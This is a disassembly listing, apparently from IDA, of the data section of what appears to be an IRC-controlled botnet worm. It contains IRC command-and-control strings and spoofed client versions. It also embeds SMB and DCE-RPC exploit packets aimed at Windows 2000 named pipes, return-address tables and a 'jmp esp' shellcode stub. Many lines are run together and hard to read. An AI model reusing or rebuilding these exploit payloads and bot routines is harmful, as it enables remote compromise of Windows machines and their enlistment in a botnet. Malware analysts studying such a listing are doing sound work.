aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40A9CF+DA9�o
align 4
dword_419BC4 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40A9CF+D20�o
dd 2037325h, 0
dword_419BE0 dd 26718h align 8
dword_419BE8 dd 3C2206E9h dd 3 dup(0)
dword_419BF8 dd 6C807B75h dd 4 dup(0)
dword_419C0C dd 0BB57C41h dd 3 dup(0)
dword_419C1C dd 0C86E8h dd 2 dup(0)
dword_419C28 dd 247806E8h dd 2 dup(0)
dword_419C34 dd 1E106E8h align 10h
dword_419C40 dd 2176AED8h dd 2 dup(0)
dword_419C4C dd 203A5049h, 2343003h, 2037325h, 0dword_419C5C dd 1D48h dd 0
dword_419C64 dd 24974240h align 10h
dword_419C70 dd 25DD5518h dd 2 dup(0)
dword_419C7C dd 25D7CCD8h dd 2 dup(0)
dword_419C88 dd 0DE54DCA1h dd 3 dup(0)
dword_419C98 dd 0DE54F891h dd 3 dup(0)
dword_419CA8 dd 0B8934BAFh dd 3 dup(0)
dword_419CB8 dd 40A7E799h dd 3 dup(0)
dword_419CC8 dd 0D2118h dd 2 dup(0)
dword_419CD4 dd 1C28D999h dd 3 dup(0)
dword_419CE4 dd 0BC15B98h align 10h
dword_419CF0 dd 5E000h dd 2 dup(0)
dword_419CFC dd 13DC40h dd 2 dup(0)
dword_419D08 dd 4548h align 10h
aThisBuildIsBro db 'This build is broken and will not function properly.',0
; DATA XREF: sub_40A9CF:loc_40B1D8�o
align 4
aThisBuildIsFul db 'This build is fully functional',0 ; DATA XREF: sub_40A9CF+7FD�o
align 4
dword_419D68 dd 2343003h, 4B4F5242h, 2034E45h, 0dword_419D78 dd 2333003h, 2034B4Fh, 0dword_419D84 dd 80h, 0 dword_419D8C dd 8EEABCA7h, 0DBB8CAABh, 0B780E793h, 0CE95AFF0h, 8BC1D0D2h
; DATA XREF: sub_40A9CF+790�o
dd 0BCD4D083h, 0B986E7EBh, 2 dup(0)
dword_419DB0 dd 586B2D0h dd 2 dup(0)
dword_419DBC dd 53C0F449h dd 3 dup(0)
dword_419DCC dd 0C3CA2A40h dd 3 dup(0)
dword_419DDC dd 0EDF6B6B0h, 0D9B0A299h, 0C5A49286h, 0CDF8D78Ah, 9F81C7ABh
; DATA XREF: sub_40A9CF+534�o
dd 0ABC2DDE8h, 2 dup(0)
dword_419DFC dd 0C2D59CB6h, 0C2968BAAh, 0E291ADB9h, 0D1E6F5BDh, 2 dup(0)
; DATA XREF: sub_40A9CF+448�o
dword_419E14 dd 0FFF4BAA1h, 0D7A8AB89h, 0F49C8F97h, 0FADCEEACh, 0FCEE8194h
; DATA XREF: sub_40A9CF+437�o
dd 0FD9E84B7h, 0D9D5B1BCh, 0E0ECDD8Ah, 0C5D78780h, 0E09FBCAAh
dd 0F99AABB8h, 2 dup(0)
dword_419E48 dd 1EB10h align 10h
dword_419E50 dd 40A50859h align 10h
dword_419E60 dd 40A24CD9h align 10h
dword_419E70 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40A9CF+39C�o
dd 3203A64h, 25023430h, 20373h
dword_419E90 dd 2382D298h dd 2 dup(0)
dword_419E9C dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40A9CF+2A1�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_419EC0 dd 232320h dword_419EC4 dd 21F6D298h align 10h
dword_419ED0 dd 688B00h dd 2 dup(0)
dword_419EDC dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40A9CF+139�o
dd 2037325h, 0
dword_419EF8 dd 45DAB40h dd 2 dup(0)
dword_419F04 dd 4B43494Eh, 732520h ; sub_40A9CF+EF�o ...
dword_419F0C dd 0F22B0h dd 2 dup(0)
dword_419F18 dd 7376E080h dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_40C93C+88�o
; sub_40D871+85F�o
align 4
asc_419F48: ; DATA XREF: sub_40C93C+30�o
; sub_40C93C+B5�o
unicode 0, <;>,0
asc_419F4C db '<=',0 ; DATA XREF: sub_40CA29:loc_40CE59�o
align 10h
asc_419F50 db '>=',0 ; DATA XREF: sub_40CA29:loc_40CE07�o
align 4
asc_419F54: ; DATA XREF: sub_40CA29:loc_40CDDB�o
dw 3Eh
unicode 0, <>,0
asc_419F58 db '!=',0 ; DATA XREF: sub_40CA29:loc_40CDAF�o
align 4
asc_419F5C db '==',0 ; DATA XREF: sub_40CA29:loc_40CD83�o
align 10h
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40CA29:loc_40CC43�o
; sub_40CA29:loc_40CD58�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40CA29:loc_40CC1F�o
; sub_40CA29:loc_40CD34�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40CA29:loc_40CBFB�o
; sub_40CA29:loc_40CD10�o
align 10h
aFree db '$free',0 ; DATA XREF: sub_40CA29:loc_40CBD7�o
; sub_40CA29:loc_40CCEC�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40CA29:loc_40CBB1�o
; sub_40CA29:loc_40CCC6�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40CA29+158�o
; sub_40CA29+26D�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40CA29+EE�o
align 4
asc_419FAC db '&&',0 ; DATA XREF: sub_40CA29+9D�o
; sub_40CA29+45D�o
align 10h
asc_419FB0: ; DATA XREF: sub_40CA29+28�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_40CEB0+5C�o
align 10h
a6667 db '6667',0 ; DATA XREF: sub_40CF2F:loc_40CF60�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_40D043+27B�o
; sub_40D871+431�o
align 10h
aG: ; DATA XREF: sub_40D043+1DC�o
; sub_40D871+392�o
unicode 0, <G>,0
aA: ; DATA XREF: sub_40D043+1C6�o
; sub_40D871+37C�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_40D043+1B0�o
; sub_40D871+366�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_40D043+160�o
; sub_40D871+316�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_40D043+E2�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_40D043+3F�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_40D420+10�o
; sub_40D53F+37�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_40D4AB+10�o
; sub_40D53F+AF�o
align 4
dword_41A038 dd 1 dword_41A03C dd 7373656Dh, 20656761h, 0dword_41A048 dd 49544F4Eh, 25204543h, 13A2073h, 0dword_41A058 dd 56495250h, 2047534Dh, 3A207325h, 1aMirc db 'mIRC',0 ; DATA XREF: sub_40D734+6�o
; sub_40D74D:loc_40D76E�o
align 10h
asc_41A070: ; DATA XREF: sub_40D871+CB7�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_40D871:loc_40E1C0�o
; sub_40E618+89�o
align 4
asc_41A07C db '][',0 ; DATA XREF: sub_40D871+807�o
; sub_40D871+88C�o
align 10h
a332 db '332',0 ; DATA XREF: sub_40D871:loc_40DF8E�o
aNick db 'NICK',0 ; DATA XREF: sub_40D871:loc_40DF3E�o
align 4
a@: ; DATA XREF: sub_40D871:loc_40DEBE�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_40D871:loc_40DE96�o
; sub_40E618+33�o
a451 db '451',0 ; DATA XREF: sub_40D871:loc_40DE70�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_40D871+5C4�o
; sub_40D871+5EE�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_40D871+571�o
a001 db '001',0 ; DATA XREF: sub_40D871:loc_40DD97�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_40D871+515�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_40D871:loc_40DD25�o
align 4
aError db 'ERROR',0 ; DATA XREF: sub_40D871:loc_40DCFD�o
align 4
a433 db '433',0 ; DATA XREF: sub_40D871:loc_40DB2D�o
dword_41A0D8 dd 4950013Ah, 1474Ehdword_41A0E0 dd 4950013Ah, 474Ehdword_41A0E8 dd 52455601h, 4E4F4953h, 1732520h, 0aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_40D871:loc_40DAD1�o
dword_41A108 dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_40D871+24E�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_41A12C dd 4556013Ah, 4F495352h, 14Ehdword_41A138 dd 4556013Ah, 4F495352h, 4EhaSend db 'SEND',0 ; DATA XREF: sub_40D871+CD�o
align 4
dword_41A14C dd 4344013Ah, 43haPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40D871:loc_40D8DD�o
; sub_40D871+901�o ...
aMode db 'MODE',0 ; DATA XREF: sub_40D871:loc_40D8C2�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_40D871:loc_40D8A7�o
align 4
aPongS db 'PONG %s',0 ; DATA XREF: sub_40D871+25�o
aPing db 'PING',0 ; DATA XREF: sub_40D871+A�o
align 4
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_40E618:loc_40E7A5�o
align 4
byte_41A18C db 41h ; DATA XREF: sub_40E979+3C�r
; sub_40EB4E+24�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
dword_41A1D0 dd 3430032Dh, 3732502h, 30032E02h, 73250234h, 202D0203h
; DATA XREF: sub_4129CA+5C�o
dd 202E7525h, 20776152h, 6E617274h, 72656673h, 206F7420h
dd 63207325h, 6C706D6Fh, 2E657465h, 0
dd 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F9D463h, 750362C3h, 75035173h, 3 dup(717564B8h)
dd 71AB7BFBh, 773AD507h, 7C941EEDh, 77DB565Ch, 77FD1F89h
dd 2 dup(77E216B8h), 1130h, 0
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dd 2 dup(4A9D5E21h), 0
dd 77777777h, 77777776h, 77777775h, 77F326C6h, 77F29267h
dd 77777772h, 77F32836h, 750362C3h, 75035173h, 3 dup(7C2FA0F7h)
dd 2 dup(71AB7BFBh), 7C941EEDh, 77E216B8h, 77FD1F89h, 2 dup(77E216B8h)
dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx:
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 8
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset loc_43005B+1
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 10h
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dd 2180310h, 10016C6h, 100139Dh, 1001C55h, 1001C98h
dword_41A7A8 dd 5F5C0A0Dh, 2E2Fh ; sub_410B52+F�o
dword_41A7B0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41A7FC dd 3000005h, 10h, 5 dup(0)dword_41A818 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_41A860 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_41A894: ; DATA XREF: sub_410649+153�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_41A8A0: ; DATA XREF: sub_410649+E5�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_41A8AC: ; DATA XREF: sub_410649+202�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
jmp short loc_41A8C9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41A8B4: ; DATA XREF: sub_410649+2DB�o
jmp short near ptr word_41A8BA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_41A8BA dw 0 ; CODE XREF: .packed:loc_41A8B4�j
; ---------------------------------------------------------------------------
loc_41A8BC: ; DATA XREF: sub_410649+330�o
jmp short near ptr word_41A8C2
; ---------------------------------------------------------------------------
loc_41A8BE: ; CODE XREF: .packed:loc_41A8AC�j
; .packed:loc_41A8DC�j
jmp short loc_41A8C4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41A8C2 dw 0 ; CODE XREF: .packed:loc_41A8BC�j
; ---------------------------------------------------------------------------
loc_41A8C4: ; CODE XREF: .packed:loc_41A8BE�j
; DATA XREF: sub_410649+385�o
jmp short near ptr loc_41A8C9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41A8C9: ; CODE XREF: .packed:0041A8AE�j
; .packed:loc_41A8C4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_41A8CC dd offset loc_41005C ; DATA XREF: sub_410649+449�o
dd 2 dup(0)
dword_41A8D8 dd 77F33723h ; ---------------------------------------------------------------------------
loc_41A8DC: ; DATA XREF: sub_410649+286�o
jmp short loc_41A8BE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_41A8E0: ; DATA XREF: sub_410649+22E�o
lahf
jnz short loc_41A8FB
loc_41A8E3: ; DATA XREF: sub_410649+13D�o
add [ecx+1Ch], bl
loc_41A8E6: ; CODE XREF: .packed:loc_41A8F0�j
add [ecx], al
loc_41A8E8: ; DATA XREF: sub_410649+111�o
or ecx, [ebx]
sbb eax, [eax]
loc_41A8EC: ; DATA XREF: sub_410649+127�o
jmp short near ptr dword_41A8F4
; ---------------------------------------------------------------------------
align 10h
loc_41A8F0: ; DATA XREF: sub_410649+FB�o
jmp short loc_41A8E6
; ---------------------------------------------------------------------------
align 4
dword_41A8F4 dd 85000000h ; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_41A8FB: ; CODE XREF: .packed:0041A8E1�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h, 240043h, 3F3F0000h, 3F3F3Fh, 0
dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dd offset loc_401495
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
sub sp, 71Ch
jmp esp
; ---------------------------------------------------------------------------
align 4
dd 1004600h, 7515123Ch, 751C123Ch, 42B68ABAh, 42D01E50h
dd 34000112h, 0
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dd 34EEA51Bh, 0
dd 12400h, 0
dword_41AF50 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_410B52+62�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41AFDC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_41B088 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+E2�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+13C�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+179�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_410B52+1B9�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+216�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 4
dd 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_410B52+348�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; sub_410B52+29B�o ...
dword_41B410 dd 2080Ah, 0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
